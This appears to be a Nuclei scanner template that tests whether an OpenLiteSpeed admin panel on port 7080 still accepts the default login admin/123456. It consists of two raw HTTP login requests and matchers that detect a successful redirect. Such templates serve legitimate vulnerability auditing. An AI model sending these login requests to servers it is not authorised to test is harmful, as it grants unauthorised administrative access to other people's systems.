id: openlitespeed-default-credentials

info:
  name: OpenLiteSpeed Web server default credentials
  author: osamahamad
  severity: critical
  description: default credentials.
  reference:
    - https://docs.litespeedtech.com/cloud/docker/openlitespeed/

requests:
  - raw:
      - |
        POST /login.php HTTP/2
        Host: {{Hostname}}:7080
        Cookie: litespeed_admin_lang=english
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 24

        userid=admin&pass=123456

      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}:7080
        Cookie: litespeed_admin_lang=english
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 24

        userid=admin&pass=123456

    matchers-condition: and 
    matchers: 
      - type: word 
        words: 
        - "/index.php"
        - "LiteSpeed"
        part: header
        condition: and

      - type: status 
        status:
          - 302 
